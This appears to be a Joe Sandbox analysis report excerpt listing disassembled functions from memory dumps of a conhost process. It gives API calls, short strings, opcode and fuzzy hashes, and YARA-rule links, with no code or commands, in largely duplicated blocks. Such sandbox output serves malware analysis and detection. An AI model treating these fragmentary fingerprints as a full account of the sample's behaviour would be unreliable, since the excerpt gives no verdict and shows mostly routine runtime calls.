Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 0e92f28381181a18f15f8e02a7fd8488fd9fd498e3f85fa265d0036eaed9127e
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: F851E532B016908ADB58CF9DE4147AC7B97E355B88F144138FE8A4779AD7BDC942C701

Function 0000013F08E6A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000013F08E6A75B
_CallSETranslator.LIBVCRUNTIME ref: 0000013F08E6A7A7

Strings

MOC, xrefs: 0000013F08E6A76F
RCC, xrefs: 0000013F08E6A777

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 6ae441823f66c4dfb1796ada84344aea0e7ca97119b17b64bc4c8c975cd26344
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: C461A172904BC4C1DB249F59E4403DABBA1F785BD4F144229FB9813B96DB7CC2A2CB01

Function 0000013F08E6AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000013F08E6AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000013F08E6ABBC

Strings

csm, xrefs: 0000013F08E6AAF6
csm, xrefs: 0000013F08E6AC0E

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: a7c294b21de7f01a3a50b3ecbea0311a8586886d1fca64cce65c8fb795595574
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 99518232D002509BEB788FA995443987F92F355BD4F18413AEA9957B96CB3CC662C702

Function 0000013F08E9A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000013F08E9A75B
_CallSETranslator.LIBVCRUNTIME ref: 0000013F08E9A7A7

Strings

RCC, xrefs: 0000013F08E9A777
MOC, xrefs: 0000013F08E9A76F

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: d7fde235d5227e2b93ff57a2711259e3635920c72556fe40edf54c5b2a4e3e89
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: D7618F72904BC485DB359F59E4407DABBA1FB85B94F044229EFD813B96DBBCC292CB01

Function 0000013F08E9AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000013F08E9AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000013F08E9ABBC

Strings

csm, xrefs: 0000013F08E9AAF6
csm, xrefs: 0000013F08E9AC0E

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 8e7788310e82ba04ae43e17f296f8da0f534e254cb9e6b00d9af8c0bee487296
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 885172329007D09BEB788F9995443987FA2FB54B94F14413AEEC947B96C7BCC652C702

Function 0000013F081C9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000013F081C9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000013F081C9FBC

Strings

csm, xrefs: 0000013F081CA00E
csm, xrefs: 0000013F081C9EF6

Memory Dump Source

Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 39599bd1708f2b5cd30f498ff7cd7bed36b855209c2b8c61c54cfed82af4a826
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: E751B272A047948AEB788F19D1443987FA2FF54BD4FA44139FA8947BD6CB38C662C701

Function 0000013F08E63950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000013F08E63972
StrStrW.SHLWAPI ref: 0000013F08E63990
StrToIntW.SHLWAPI ref: 0000013F08E639B7

Part of subcall function 0000013F08E61A30: OpenProcess.KERNEL32 ref: 0000013F08E61A56
Part of subcall function 0000013F08E61A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000013F08E61A74
Part of subcall function 0000013F08E61A30: PathFindFileNameW.SHLWAPI ref: 0000013F08E61A83
Part of subcall function 0000013F08E61A30: lstrlenW.KERNEL32 ref: 0000013F08E61A8F
Part of subcall function 0000013F08E61A30: StrCpyW.SHLWAPI ref: 0000013F08E61AA2
Part of subcall function 0000013F08E61A30: CloseHandle.KERNEL32 ref: 0000013F08E61AB0

Part of subcall function 0000013F08E63F88: StrCmpNIW.SHLWAPI(?,?,?,0000013F08E6272F), ref: 0000013F08E63FA0

Strings

pid_, xrefs: 0000013F08E63968

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 8851abfa062d18bdae6a9fe66041635ba81dad6582a7564f810ce9d758d7d578
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: CD114231714781A1EB289BA9EC003DA6AA6F7547C4F944039FA498379AEF6CCA57C701

Function 0000013F08E93950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000013F08E93972
StrStrW.SHLWAPI ref: 0000013F08E93990
StrToIntW.SHLWAPI ref: 0000013F08E939B7

Part of subcall function 0000013F08E91A30: OpenProcess.KERNEL32 ref: 0000013F08E91A56
Part of subcall function 0000013F08E91A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000013F08E91A74
Part of subcall function 0000013F08E91A30: PathFindFileNameW.SHLWAPI ref: 0000013F08E91A83
Part of subcall function 0000013F08E91A30: lstrlenW.KERNEL32 ref: 0000013F08E91A8F
Part of subcall function 0000013F08E91A30: StrCpyW.SHLWAPI ref: 0000013F08E91AA2
Part of subcall function 0000013F08E91A30: CloseHandle.KERNEL32 ref: 0000013F08E91AB0

Part of subcall function 0000013F08E93F88: StrCmpNIW.SHLWAPI(?,?,?,0000013F08E9272F), ref: 0000013F08E93FA0

Strings

pid_, xrefs: 0000013F08E93968

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: b04f3e8386181e5b20b62bed1de67d63b439c2ff1e73b65880a6fe0abd7df61f
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 3E11B7717107C191EB189BA9EC003DA6AA6F784740F905039FE8983796EFECCA47C701

Function 0000013F08E71FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000013F08E72027
WriteFile.KERNEL32 ref: 0000013F08E72304
WriteFile.KERNEL32 ref: 0000013F08E7234A
GetLastError.KERNEL32 ref: 0000013F08E72409

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 600ee3f02dcb8055d3b60fcc835ec16438250af409e2a2cb5bb1ed086c4a0ed4
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: F2D1D432B14B8489E725CFA9D4406DC3BB2F355B98F44412AEF5E97B9ADA38C607C341

Function 0000013F08EA1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000013F08EA2027
WriteFile.KERNEL32 ref: 0000013F08EA2304
WriteFile.KERNEL32 ref: 0000013F08EA234A
GetLastError.KERNEL32 ref: 0000013F08EA2409

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: cde9fd009a7ff3618527fb6698e0f7321ec57e0de63fa29b1cdae0cfad8ed5a8
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: DDD1DF32B14A8489E715CFA9D4402DC7BB2F355B98F40422AEF5DA7B9ADA38D607C341

Function 0000013F08E614A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000013F08E614C6
HeapFree.KERNEL32 ref: 0000013F08E614D5
GetProcessHeap.KERNEL32 ref: 0000013F08E614E2
HeapFree.KERNEL32 ref: 0000013F08E614F1
GetProcessHeap.KERNEL32 ref: 0000013F08E61501

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: a66a3545d5a6d4bd225cf5ffdf89d922247d5a0f69416c75abf11392211e0378
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: E401ED72A10F90DAE728DFAAE8041997BA2F788F81F054039EF5953715DF38D552C741

Function 0000013F08E914A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000013F08E914C6
HeapFree.KERNEL32 ref: 0000013F08E914D5
GetProcessHeap.KERNEL32 ref: 0000013F08E914E2
HeapFree.KERNEL32 ref: 0000013F08E914F1
GetProcessHeap.KERNEL32 ref: 0000013F08E91501

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: ced7286513d41188816326cbfd7ea7e4ad1db75b67b362e3fd5245e2e673ed5d
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 1401DB32A10E90DAD718DFAAA804199BBA2F798F80F054039EF4953715DE38E552C741

Function 0000013F08E728F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000013F08E728DF), ref: 0000013F08E72A12

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: d8de083f809c2ca5a378a80122898953553e7709b4b572cf3872883f370c03fe
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: B991B232E1065089FB788FA9D4507ED2FA2F355B98F44412EEF4B57A86DA38C647C302

Function 0000013F08EA28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000013F08EA28DF), ref: 0000013F08EA2A12

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: d320d04904f436c8830756ca8227744d6848f23de830d1beacbc14de4d0b7da7
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 1091D432E1065085FB588FA994503EDBFA2F754F98F44412DEF4A77A86DA38D647C302

Function 0000013F08E68090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000013F08E680BC
GetCurrentThreadId.KERNEL32 ref: 0000013F08E680CA
GetCurrentProcessId.KERNEL32 ref: 0000013F08E680D6
QueryPerformanceCounter.KERNEL32 ref: 0000013F08E680E6

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 266d3604cd7dd3e89fb3535f503f1e15404e779cfc998b5bc1f069540c451a03
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 14112A36B10F048AEB14CFA4E8543A837A4F719758F440E39EA6D867A5DF7CC2598341

Function 0000013F08E98090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000013F08E980BC
GetCurrentThreadId.KERNEL32 ref: 0000013F08E980CA
GetCurrentProcessId.KERNEL32 ref: 0000013F08E980D6
QueryPerformanceCounter.KERNEL32 ref: 0000013F08E980E6

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 5fc103146525c195a7460e15310a4157ebef3640437e949110bc2d8db5a964ec
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 57112736B10F048AEB04CFA4E8543E937B4F719B68F440E39EA6D867A5EB7CD2558341

Function 0000013F08E627E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000013F08E628CC
StrCpyW.SHLWAPI ref: 0000013F08E628E5

Part of subcall function 0000013F08E63F88: StrCmpNIW.SHLWAPI(?,?,?,0000013F08E6272F), ref: 0000013F08E63FA0

Strings

\\.\pipe\, xrefs: 0000013F08E628D7

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: d89f53054dcc15233e436f1778a593f30427a2cf1bed7bf1430256c31fa1da79
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 9E71A332A10B8181E73C9FAE98443EA6B96F3957D4F44403EEE4953B8ADE79C712C701

Function 0000013F08E927E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000013F08E928CC
StrCpyW.SHLWAPI ref: 0000013F08E928E5

Part of subcall function 0000013F08E93F88: StrCmpNIW.SHLWAPI(?,?,?,0000013F08E9272F), ref: 0000013F08E93FA0

Strings

\\.\pipe\, xrefs: 0000013F08E928D7

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: fbd15f751a32ca33cf977586ac6102e0d18958a5453ed86a9bd943862890d614
